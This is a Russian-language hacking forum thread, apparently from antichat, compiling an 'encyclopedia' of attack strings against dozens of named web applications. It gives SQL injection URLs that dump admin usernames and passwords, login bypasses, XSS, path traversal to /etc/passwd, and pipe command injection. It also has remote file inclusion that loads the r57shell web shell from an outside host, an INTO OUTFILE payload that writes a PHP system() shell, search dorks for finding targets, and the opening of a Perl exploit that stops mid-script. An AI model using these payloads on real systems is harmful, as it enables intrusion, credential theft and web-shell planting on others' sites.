Энциклопедия уязвимых скриптов

  1. Эта коллекция уязвимых скриптов собиралась DIAgen'ом. Если кому-нибудь пригодится, значит все сделано не зря.

    Код:
    Форумы
    
    phpBB v.2.0.15 Выполнение php кода в viewtopic.php
    viewtopic.php?t=1&highlight='.print f(md5(test)).'
    PBLang 4.65 Локальный include файлов
    setcookie.php?u=../../../../../../../../../../etc/passwd%00
    setcookie.php??u=../../../../../../../../../../boot.ini%00
    PHPTB v.2.0 Include файлов
    /classes/admin_o.php?absolutepath= http://rst.void.ru/download/
    r57shell.txt
    MailGust v.1.9 SQL Injection
    post запрос index.php
    method=remind_password&list=maillis tuser&fromlist=maillist&frommethod= showhtmllist&email=1%27%
    20union%20select%20%2A%20from%20for ce_sql_error%2F%2A%40hotmail%2Ecom& submit=Ok&showAvatar
    Chipmunk Forum XSS
    newtopic.php?forumID='%3C/a%3E%3CIFRAME%20SRC=javascript:aler t(%2527xss%2527)
    %3E%3C/IFRAME%3E
    oaboard v.1.0 SQL Injection
    forum.php?channel=0%20union%20selec t%20*%20from%20force_mysql_table_er ror
    Phorum 5.0.20 SQL Injection
    search.php?1,search=%20,page=1,matc h_type=ALL,match_dates=30,match_for um=ALL,body=
    1,author=1,subject=1,&forum_ids[]=-99)/**/generate_sql_error
    Cyphor 0.19 XSS
    /include/footer.php?t_login=%3Cscript%3Ealer t(%22XSS%22)%3C/script%3E
    W-Agora 4.2.0 XSS
    /templates/admin/login_form.php?msg_login=%3Cscript% 3Ealert(%22XSS%22)%3C/script%3E
    WizForum 1.20 SQL Injection
    ForumTopicDetails.php?TopicID=11111 111%20union%20Select%20*%20from%20E ronatedInex
    istentTable
    EkinBoard 1.0.3 SQL Injection
    admin/index.php ?page=general&step=2
    Cookie: username=%27or+isnull%281%2F0%29+AN D+level%3D3%2F%2A; password=
    Snitz Forums 2000 v.3.4.05 XSS
    post.asp ?method=Topic&FORUM_ID=1&CAT_ID=1&t ype=xss-${random}
    PHP-Post 1.0 XSS
    profile.php ?user='%3CIFRAME%20SRC=javascript:a lert(%2527xss-${random}%2527)%3E%3
    C/IFRAME%3E
    WSN Forum 1.21 SQL Injection
    memberlist.php ?action=profile&id=1'%20select%20*% 20from%20force_mysql_warning
    sCssBoard 1.12 XSS
    index.php ?act=search-results
    post search_term=%3Cscript%3Ealert%28%27 wvs-${random}%27%29%3C%2Fscript%3E+&sor tby=relevancy
    freeForum 1.1 SQL Injection
    forum.php?mode=thread&thread=force_ mysql_fetch_object_warning
    Orca Forum 4.3.b SQL Injection
    forum.php ?msg=2'force_mysql_num_rows_warning
    Pearl Forums 2.4 SQL Injection
    index.php ?mode=forums&forumId=1%20union%20se lect%20*%20from%20force_error
    SimpleBBS v.1.1 Выполнение php кода
    index.php ?v=newtopic&c=1
    POST name=<?php echo md5("test");?>&subject=mysubject&me ssage=mymessage&sendTopic=Send
    ADP Forum v.2.0.2 Информация о пользователя
    /users/
    ADN Forum v.1.0b SQL Injection
    verpag.php?pagid=999'%20and_force_m ysql_error/*
    MyBuletinBoard v.1.0.2 Раскрытие префикса таблицы
    search.php?s=de1aaf9b&action=do_sea rch&keywords=a&srchtype=3
    MyTopix v.1.2.3 SQL Injection и раскрытие пути срипта
    /modules/logon.mod.php
    Pentacle In-Out Board v.6.03.0.0080 SQL Injection
    login.asp POST username=anypassword&userpassword=% 27+or+%271%27%3D%271&Submit=Log+in
    Battleaxe Software Forums v.2.0 XSS
    failure.asp ?err_txt=text%3C/b%3E%3Cscript%3Ealert(%22xss-${random}%22);%3C/script%3E%3Cb%3Etext
    
    
    PHP Библиотеки
    
    PEAR XML_RPC 1.3.0 Выполнение команд (подвержены Affected PEAR XML_RPC versions (up to 1.3.0). Affected web applications:TikiWiki. PostNuke
    Drupal. b2evolution. b2. phpGroupWare. eGroupware. Serendipity Weblog. phpAdsNew. Max Media Manager. phpWiki. Blog:CMS. CivicSpace )
    xmlrpc.php xmlrpc/server.php serendipity_xmlrpc.php adxmlrpc.php nucleus/xmlrpc/server.php
    POST <?xmlversion="1.0"?><methodCall><me thodName>test.method</methodName><params><param><value><n ame>','')); printf(md5(acunetix_wvs_security_te st)); exit;//</name></value></param></params></methodCall>
    ADOdb
    1) SQL Injection
    /server.php?sql=SELECT '[content]' INTO OUTFILE '[file]'
    2) Выполнение функции php
    /tests/tmssql.php?do=phpinfo
    
    
    Network tools
    
    phpLDAPadmin 0.9.6 Выполнение php кода
    welcome.php ?custom_welcome_page= http://rst.void.ru/download/r57shell.txt
    Netquery [host] Произвольное выполнение команд
    nquser.php POST
    1) querytype=dig&host=a%27%7Ccat%20%27 %2Fetc%2Fpasswd&digparam=ANY&x=11&y =17
    2) querytype=dig&host=%7Ccat%20%2Fetc% 2Fpasswd&digparam=ANY&x=11&y=17
    
    
    Календари и Планировщики
    
    phpCommunityCalendar v.4.0.3 Обход Логина
    webadmin/login.php POST Username=%27+or+isnull%281%2F0%29+% 2F*&Password=&Returned=1
    Calendarix v.1.6 SQL Injection
    cal_login.php POST login=%27+or+isnull%281%2F0%29%2F*& password=any
    Teca Diary Personal Edition v.1.0 SQL Injection
    index.php?mm='%20force_sql_error&yy =2006
    CALimba v.0.99.2 Sql Injection
    index.php POST ute_login=%27%29+or+isnull%281%2F0% 29%2F*&ute_password=anypassword&cmd OK=Login%21
    Maian Events v.1.00 SQL Injection
    menu.php?month='forceerror'
    
    
    Блоки новостей
    
    myBloggie 2.1.3 SQL Injection
    login.php POST username=%27+or+isnull%281%2F0%29+% 2F*&passwd=&submit=Log+In
    Simplog 0.9.1 SQL Injection
    archive.php?blogid=force_error_for_ test_reason
    Zomplog 3.4 XSS
    get.php?username=%3Cbr%3E%3Cb%3Exss %3C/b%3E%3Cbr%3E
    CuteNews 1.4.1 Shell Injection
    show_archives.php ?template=../inc/ipban.mdu%00&member_db[1]=1&action=add&add_ip=%22%3C?php%20e cho%20md5(%22test%22)
    ;%20die;?%3E.%22%20HTTP/1.0\r\n
    Cute News 1.4.1 Local File Inclusion
    show_archives.php?template=../../../../../../../../../../etc/passwd%00
    show_archives.php?template=../../../../../../../../../../boot.ini%00
    SimpleBlog v.2.1 SQL Injection
    default.asp ?view=archives&month=%22generate_er ror&year=2004
    Bit5blog v.8.1 SQL Injection
    admin/processlogin.php POST username=%27+or+isnull%281%2F0%29%2 F*&password=%27+or+isnull%281%2F0%2 9%2F*
    WebspotBlogging v.3.0 SQL Injection
    login.php POST username=%27+or+isnull%281%2F0%29%2 F*&password=anypassword
    e-moBLOG v.1.3 SQL Injection
    /admin/index.php POST login=aaa%27+union+select+%27bbb%27 %2C+%27161da2fa81d32d4071ee16f7f77c b463%27%2F*&password=
    any_password
    miniBloggie v.1.0 SQL Injection
    login.php POST user=%27+or+isnull%281%2F0%29%2F*&p wd=%27+or+isnull%281%2F0%29%2F*&sub mit=Log+In
    Text Rider v.2.4 Список пользователей
    /data/userlist.txt
    AndoNET Blog SQL Injection
    index.php?ando=comentarios&entrada= 1'generate%20error
    Loudblog v.0.4 PHP Code Injection
    /loudblog/inc/backend_settings.php?GLOBALS[path]= http://rst.void.ru/download/r57shell.txt
    PluggedOut Blog v.1.9.9c SQL Injection
    exec.php?action=comment_add&entryid =force_error
    Clever Copy v.3.0 SQL Injection
    mailarticle.php?ID='UNION%20SELECT% 200,0,0,0,0,0,username,password,0,0 ,0,0,0,0,0,0,0
    %20FROM%20CC_admin/*
    Magic News Lite v.1.2.3 Code Injection
    preview.php?php_script_path=http://rst.void.ru/download/r57shell.txt
    WordPress v.2.0.1 Раскрытие пути
    /wp-includes/default-filters.php
    sBlog v.0.7.2 XSS
    search.php POST keyword=%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3B%3C%2Fscript%3E
    Maian Weblog v.2.0 SQL Injection
    print.php?cmd=log&entry=1'%20or%20g enerate_error=2
    
    
    Faq Systems
    
    phpMyFAQ 1.5.1 SQL Injection
    admin/password.php POST username=%27+or+isnull%281%2F0%29+% 2F*&[email protected].com
    A-FAQ 1.0 SQL Injection
    faqDsp.asp?catcode=12%20union%20sel ect%20name%20from%20msysobjects%20i n%20'\nopath\
    sqlerr
    Atlantis Knowledge Base Software v.3.0 SQL Injection
    search.php POST searchStr=%25%27+union+select+*+fro m+force_mysql_warning%2F*
    ASP Survey v1.10 SQL Injection
    /Admin/Login_Validate.asp POST Username=admin&Password=%27or%27&De st=http%3A%2F%2Fasp.loftin-nc.com%2FASPSurvey%2FDemo%2FAdmin%2
    FDefault.asp
    Owl v.0.82 File Inclusion
    /lib/OWL_API.php?xrms_file_root=nonexist ent_test_includefile%00
    
    
    Web Portals
    
    PHPNuke 7.8 Remote Directory Traversal
    modules.php?name=Search&file=../../../../../../../../../../etc/passwd%00
    modules.php?name=Search&file=../../../../../../../../../../../boot.ini%00
    
    
    Партнерские системы
    
    TWiki rev Parameter Remote Command Execution Vulnerability
    view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd
    view/Main/TWikiUsers?rev%3D2%20%7Ctype%20%5Cb oot%2Eini
    PmWiki 2.0.12 q-Parameter XSS
    pmwiki.php ?n=Site.Search?action=search&q=test _search_item%27%20onMouseOver%3D%27 alert%28%22wvs-xss-magic
    -string-${random}%22%29%3B%27%20
    
    ProjectApp v.3.3 XSS
    default.asp ?skin_number=XSS.css%22%3E%3Cscript %3Ealert('wvs-xss-magic-string-${random}')%3C/script%3E%3C
    IntranetApp v.3.3 XSS
    login.asp ?ret_page=a%22%3E%3Cscript%3Ealert( 'xss-${random}')%3C/script%3E%3C%22
    dotproject v.2.0.1 File Inclusion
    includes/db_adodb.php?baseDir=http://rst.void.ru/download/r57shell.txt
    Qwiki v.1.5.1 XSS
    index.php?page=Home&from='%3Cscript %3Ealert(%22xss-${random}%22)%3C/script%3E
    
    
    Administration Tools
    
    phpMyAdmin grab_globals.lib.php
    libraries/grab_globals.lib.php POST usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/../../../../../../../
    ../../../etc/passwd&subform[1]
    libraries/grab_globals.lib.php POST
    usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/../../../../../../../
    ../../../boot.ini&subform[1]
    phpMyAdmin XSS
    queryframe.php?lang=en-iso-8859-1&server=1&hash=">='%3C/a%3E%3CIFRAME%
    20SRC=javascript:alert(%2527xss%252 7)%3E%3C/IFRAME%3E
    phpMyAdmin Раскрытие пути
    libraries/charset_conversion.lib.php ?cfg[AllowAnywhereRecoding]=true&
    allow_recoding=true)
    
    
    CMS Systems
    
    PHP-Fusion 6.00.109 SQL Injection
    faq.php?cat_id=1%27%20or%20force_my sql_error%3D%272
    MySource 2.14.0 File Inclusion
    init_mysource.php ?INCLUDE_PATH=http://rst.void.ru/download/r57shell.txt
    e107 v0617 SQL Injection
    e107_files/resetcore.php POST a_name=%27+or+isnull%281%2F0%29%2F* &a_password=&usubmit=Continue
    lucidCMS 1.0.11 SQL Injection
    index.php?command=panel
    PhpWebThings 1.4.4 SQL Injection
    forum.php?forum=-1%20union%20select%20password,passw ord,null,null%20from%
    20test_mysql_injection%20where%20ui d=1/*
    Envolution v.1.1.0 SQL Injection
    modules.php?op=modload&name=News&fi le=index&catid=%221%22%20AND%20forc e_error=error
    Acidcat v.2.1.13 SQL Injection
    default.asp?ID=26%20union%20select% 201,2,2,3,password,5,6%20from%20Con figuration
    DEV v1.5 SQL Injection
    index.php?session=0&action=openforu m&cat=force_error
    SiteEnable v.3.3 XSS
    login.asp?ret_page=a%22%3E%3Cscript %3Ealert('xss-${random}')%3C/script%3E%3C%22
    PortalApp v.3.3 XSS
    login.asp?ret_page=a%22%3E%3Cscript %3Ealert('xss-${random}')%3C/script%3E%3C%22
    Typo3 v.3.8.1 Раскрытие пути
    /tslib/showpic.php
    RunCMS v.1.3a5 XSS
    /modules/mydownloads/ratefile.php?lid=1%22%3E%3Cscript%3 Ealert('xss-${random}');
    %3C/script%3E%3Cbr%20name=%22nothing
    Mambo v.4.5.3h SQL Injection
    /index.php POST username=%27or+isnull%281%2F0%29%2F *&passwd=anypassword&option=login&S ubmit=Login&op2=login&lang
    =english&return=${file}&message=0
    Dragonfly CMS v.9.0.6.1 XSS
    /index.php POST search=%22%3E%3Cscript%3Ealert%28%2 2wvs-xss-magic-string-${random}%22%29%3C%2Fscript%3E&topi c=0&cat
    =0&news_search_comments=0&coppermin e=
    Nodez v.4.6.1.1 XSS
    /index.php?node=system&op=block%3Csc ript%3Ealert(%22wvs-xss-magic-string-${random}%22)
    %3C/script%3E&block=3&bop=more
    XOOPS v.2.0.11 SQL Injection
    /xmlrpc.php POST <?xml version="1.0"?><methodCall><methodN ame>blogger.getUsersBlogs</methodName><params><param><value>
    <string></string></value></param><param><value><string>any') or isnull(1/0)/*</string></value></param></params></methodCall>
    
    
    Gallery Applications
    
    Gallery "g2_itemId" локальный иклуид
    main.php?g2_itemId=/../../../../../../../../../../../boot.ini%00
    main.php?g2_itemId=/../../../../../../../../../../../etc/passwd%00
    /upgrade/index.php ?stepOrder[]=../../../../../../../../include_inexistent_file.txt%00
    Coppermine Photo Gallery v.1.4.2 игнорировать конфигурацию
    relocate_server.php POST continue=1
    Instant Photo Gallery v.1.0 SQL Injection
    portfolio.php?cat_id="force_sql_err or
    Enhanced Simple PHP Gallery v.1.7 Раскрытие пути
    index.php?dir=inexistent_directory
    WhiteAlbum v.2.5 SQL Injection
    pictures.php?dir=force_mysql_warnin g
    LinPHA v.1.0 Local File Inclusion
    /docs/index.php?lang=/../../../../../../../../../../etc/passwd%00
    /docs/index.php?lang=/../../../../../../../../../../boot.ini%00
    
    
    Script Collections
    
    Codegrrl Arbitrary Local File Inclusion
    protection.php?action=logout&siteur l=../../../../../../../../../../etc/passwd%00
    protection.php?action=logout&siteur l=../../../../../../../../../../boot.ini%00
    Techno Dreams Products SQL Injection
    admin/login.asp POST userid=%27union+all+select+%271%27% 2C%271%27+from+admin+where+%27%27%3 D%27&passwd=1&submit=Login
    AlstraSoft Template Seller Pro 3.25 File Inclusion
    include/paymentplugins/payment_paypal.php?config[basepath]=inexistent_hacker_box
    AlstraSoft Affiliate Network Pro v.7.2 SQL Injection
    admin/admin_login_validate.php POST login=%27+or+isnull%281%2F0%29+%2F* &passwd=&B1=Login
    OpenEdit v.4.0 XSS
    /store/search/results.html ?page=%3Ciframe%3Exss-${random}%3C/iframe%3E
    
    
    Электронная коммерция
    
    Zend Cart 1.2.6 SQL Injection
    admin/password_forgotten.php POST admin_email=%27UNION+SELECT+0%2C0%2 C%27%3C%3Fphp+system%28%24_GET%5Bcm d%5D%29%3B+%3F%3E%27%2C0
    +INTO+OUTFILE+%27shell.php%27+FROM+ force_table_error%2F*&submit=resend
    Lizard Cart CMS v.1.0.4 SQL Injection
    detail.php?id=-1'
    My Amazon Store Manager v1.0 XSS
    /search.php ?q=%3Cscript%3Ealert('xss-${random}')%3C/script%3E&Mode=apparel
    CRE Loaded v.6.15 XSS
    /admin/htmlarea/popups/file/files.php?q=%3Cscript%3Ealert('xss-${random}')%3C/
    script%3E&Mode=apparel
    NZ Ecommerce SQL Injection
    /index.php?action=Information&inform ationID=1%20and%20generate_error=er ror
    
    
    Guest Book Applications
    
    Ades Guestbook v.2.0 XSS
    read.php ?pageNum_rsRead=1&totalRows_rsRead= %3Cscript%3Ealert%28%27wvs-xss-magic-string-${random}%27%29%3
    C%2Fscript%3E
    Mantis 1.00 File Inclusion
    bug_sponsorship_list_view_inc.php?t _core_path=../../../../../../../../etc/passwd%00
    bug_sponsorship_list_view_inc.php?t _core_path=../../../../../../../../../boot.ini%00
    Flyspray 0.9.8 XSS
    index.php ?tasks=all%22%3E%3Cscript%3Ealert%2 8%22XSS%22%29%3 C%2Fscript%3E%26project%3D0
    Gemini v.2.0 XSS
    /issue/createissue.aspx?rtcDescription$Rad Editor1=1><script>alert(${random}); </script>
    
    
    Другие инструменты
    
    Digital Scribe 1.4 SQL Injection
    login.php POST username=%22+or+isnull%281%2F0%29+% 2F*&pass1=&submit=Login
    ATUTOR 1.5.1 SQL Injection
    password_reminder.php POST form_password_reminder=true&form_em ail=%27
    PHP Advanced Transfer Manager System локальный include
    viewers/txt.php?filename=../../../../../../../../../../boot.ini%00
    viewers/txt.php?filename=../../../../../../../../../../etc/passwd%00
    Chipmunk Topsites XSS
    recommend.php ?ID='%3C/a%3E%3CIFRAME%20SRC=javascript:aler t(%2527xss%2527 )%3E%3C/IFRAME%3E
    Chipmunk Directory XSS
    recommend.php ?entryID='%3C/a%3E%3CIFRAME%20SRC=javascript:aler t(%2527xss%2527 )%3E%3C/IFRAME%3E
    Gcards 1.44 limit parameter SQL Injection
    news.php ?limit=force_sql_error
    phpSysInfo 2.3 XSS
    index.php ?VERSION=%22%3E%3Cscript%3Ealert('F ORCE_XSS')%3C/script%3E
    Advanced Poll 2.03 XSS
    popup.php ?poll_ident=%3Cscript%3Ealert(%22wv s-xss-magic-string-${random}%22)%3C/script%3E
    PHPGreetz 0.99 Remote File Include
    content.php?content=http://rst.void.ru/download/r57shell.txt
    eFiction 1.1 XSS и SQL Injection
    titles.php?action=viewlist&let='%20 UNION%20SELECT%200,0,'%3Cscript%3Ea lert(%2 2wvs-xss-magic-string-${random}%22)%3C/script%3E',0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,pen name,0%20FROM%20fanfiction_authors% 20/*
    Google API Search Engine v.1.3.1 XSS
    index.php?REQ=%3Cscript%3Ealert%28% 27wvs-xss-magic-string-${random}%27%29%3C%2Fscript%3ESubmi t=Submit
    phpArcadeScript v.2.0 XSS
    /includes/tellafriend.php?about=game&gamename =%3Cscript%3Ealert(${random});%3C/script%3E
    сам не пробывал;) может кому то пригодиться;)
     
  2. очень даже спс!!))
     
  3. Оформление ужасное! )
    Подредактирую на досуге...
     
  4. Update by DIAgen
     
  5. Web Directory Script <= 2.0 (name) SQL Injection Vulnerability

    magic_quotes_gpc = Off

    http://localhost/[installdir]/

    Exploit:

    Код:
    listing_view.php?name='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+members/*
    http://milw0rm.com/exploits/6298

    Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities

    magic_quotes_gpc = Off

    http://localhost/[installdir]/

    Exploit:

    Код:
    index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
    Код:
    index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
    Dork:

    made by matterdaddy

    http://milw0rm.com/exploits/6297

    iFdate <= 2.0.3 Remote SQL Injection Vulnerability

    Condition: magic_quotes_gpc = Off

    http://localhost/[installdir]/members_search.php

    Search Name/Nickname

    Exploit 1:

    Код:
    ' union select 1,concat_ws(0x3a,admin_username,admin_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_admins/*
    Exploit 2:

    Код:
    ' union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_users/*
    http://milw0rm.com/exploits/6315
    (c) ~!Dok_tOR!~
     
  6. YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

    Author: ~!Dok_tOR!~
    Date found: 28.08.08
    Product: YourOwnBux
    Version: 3.1, 3.2
    Price: $39.99
    DEMO: yourownbux.com/demos/
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    3.2 Beta version

    Exploit:

    http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19+from+tb_users/*

    3.1 version

    Exploit:

    http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18+from+tb_users/
    *
    http://milw0rm.com/exploits/6321

    phpMyRealty <= 1.0.9 Multiple Remote SQL Injection Vulnerabilities

    Author: ~!Dok_tOR!~
    Date found: 27.08.08
    Product: phpMyRealty
    Version: 1.0.7, 1.0.9
    Vulnerability Class: SQL Injection

    Exploit 1:

    http://localhost/[installdir]/pages.php?id=-999999+union+select+concat_ws(0x3a,login,password),2,3+from+pmr_admins/*

    Exploit 2:

    http://localhost/[installdir]/search.php?price_min=50000&price_max=-999999+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,login,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+pmr_admins/*

    Admin panel:

    http://localhost/[installdir]/admin/

    Dork:

    Powered by phpMyRealty 1.0.7
    Powered by phpMyRealty.com

    http://milw0rm.com/exploits/6320

    (c)~!Dok_tOR!~
     
  7. Battle Scrypt SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 26.08.08
    Product: Battle Scrypt
    Download script: _http://rapidshare.com/files/114200827/BattleScrypt_PHP_NULLIFIED.rar.html
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/search.php
    Model Name:

    Exploit:

    Код:
    ' union select 1,user(),3/*
    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/stats.php?id=' union select 1,2,3,4,5,6,7,8,9,10,11/*

    Big Fat Rate My Photo AdSense Website SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 29.08.08
    Product: Big Fat Rate My Photo AdSense Website
    Price: $14.99
    URL: www.dotcomallsorts.com
    Download script: _http://89.223.37.140/files/scripter/Big%20Fat%20Rate%20My%20Photo%20AdSense%20Website.rar
    Vulnerability Class: SQL Injection

    Exploit 1:

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+admin/*
    Exploit 2:

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+members/*
    Admin panel:

    Код:
    http://localhost/[COLOR="#ff8c00"][B][installdir][/B][/COLOR]/admin/

    Article Publisher Pro <= v1.5 SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 30.08.08
    Product: Article Publisher Pro v1.5
    Price: $75
    URL: www.phparticlescript.com
    Vulnerability Class: SQL Injection

    Exploit 1:

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/articles.php?art_id=1+union+select+1,2,concat_ws(0x3a,aut_username,aut_password),4,5,6,7+from+flaxweb_authors+where+aut_id=1/*
    Exploit 2:

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/userarticles.php?aut_id=-1+union+select+1,concat_ws(0x3a,aut_username,aut_password),3,4,5,6,7,8,9,10,11+from+flaxweb_authors+where+aut_id=1/*
    Dork:

    All rights reserverd © Your Articles Pro 2002-2005
    Copyright 2006 - 2008, Article Publisher PRO v1.5


    Keepsakes SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 28.08.08
    Product: Keepsakes
    Price: $25
    URL: harlandscripts.com
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit 1:

    Код:
    http://localhost/[COLOR="#ff0000"][installdir][/COLOR]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+admin_sign/*
    Opera -> Source(Ctrl+F3)

    Exploit 2:

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+members/*
    Opera -> Source(Ctrl+F3)

    Exploit 3:

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+affiiiates/*
    Opera -> Source(Ctrl+F3)

    Exploit 4:

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/showtime.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
    Exploit 5:

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/showtime_noborder.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
    Admin panel:

    Код:
    http://localhost/[COLOR="#ff8c00"][B][installdir][/B][/COLOR]/admin/
    Dork:
    Copyright Your Keepsakes ® ™ 2007


    Smart Traffic 6 in 1 SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 30.08.08
    Product: Smart Traffic 6 in 1
    Download script: _http://rapidshare.com/files/139785932/smarttraffic.rar
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit:

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/inc.groups.php?pid=-1%27+union+select+1,2,concat_ws(0x3a,login,pswd,email)+from+members/*

    TopCoolive SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 30.08.08
    Product: TopCoolive
    URL: www.vetton.ru
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit 1:

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/stats.php?id='+union+select+1,user(),password,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
    Exploit 2:

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/stat_res.php?id='+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
    Exploit 3:

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/img.php?id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,password,30,31,32,33,34+from+new/*

    Warez Script (by Mikel Dean) SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 27.08.08
    Product: Warez Script
    Download script: _http://rapidshare.com/files/98446563/Warez_Script_English_by_Mikel_Dean.rar
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit 1:

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/v2/index.php?section=download&id='+union+select+1,2,3,4,concat_ws(0x3a,username,password)+from+ddl_users/*
    Exploit 2:

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/v2/index.php?section=list&subcat='+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+ddl_users/*
    Код:
    http://localhost/[COLOR="#ff8c00"][B][installdir][/B][/COLOR]/v2/index.php?section=post_upload&cat='+union+select+1,2,3,4/*
    Admin Authentication Bypass

    Код:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/v2/login.php
    User: 1' or 1=1/*
    Pass: 1' or 1=1/*
     
    1 человеку нравится это.
  8. Extreme CMS 0.9

    SQL Injection

    Vuln file: /calendar/show.php
    PHP:
        ...  ...  ...  ...  ...
    $id $_GET['event']; // from clicked day
    $sho $_GET['sho']; // display method
    $query "SELECT * FROM calendar WHERE id = '$id' "// retrieves ONE record
    $result mysql_query($query); 
    $myrow mysql_fetch_array($result);
    $ev_1 $myrow['ev_dat']; // is date for that record (allows multiple events selection)

    $found $myrow['ev_dat'];
    $pieces explode("-"$ev_1);
    $monum intval($pieces[1]);

    $query "SELECT * from calendar WHERE ev_dat = '$ev_1' "// retrieves ALL date matches
    $result mysql_query($query); 
    echo
    "<table width='480' 'cellpadding='3' cellspacing='3' align='center' style='border: thin dotted #cccccc;' bgcolor='#f7f7f7'><tr><td>";
    echo 
    "<h2>"$mo[$monum]. " "intval($pieces[2]). ", "intval($pieces[0]). "</h2>";
        ...  ...  ...  ...  ...
    Не какой фильтрации входящих данных нет. Есть одно но... результат sql запроса обрабатывается intval'ом.
    Для обхода intval (если это можно назвать обходом :)) и упрощения вывода написал эксплойт

    Exploit:
    Код:
    #!/usr/bin/perl
    #-----------------------------------------
    #  Extreme CMS 0.9 SQL Injection Exploit 
    #-----------------------------------------
    # Download Script : http://sourceforge.net/projects/extremecms
    #
    # Author          : RulleR aka Pin4eG                 
    # Contact         : rull3rrr[at]gmail[dot]com            
    # Visit           : forum.antichat.ru
    #-----------------------------------------
    
    use LWP;
    use Fcntl;
    
    #________________ CONFIG _______________
    
    $vuln = '/calendar/show.php?event=';
    $length = 40;
    $column_name = 'password';
    $table_name = 'auth';
    $id = 1; # user id
    $regexp = '<h2> 0, (.*)<\/h2>';
    $filename = 'Exp_result.txt';
    #_______________________________________
    
    
    
    $title = "
    
    [*]==================================[*]
    !                                      !
    !  Extreme CMS SQL Injection Exploit   !
    !                                      !
    !          Found && coded by RulleR    !
    !                                      !
    
    [*]==================================[*]
    ";
    print $title;
    print "\n[+] Enter Host: ";
    chop ($host = <>);
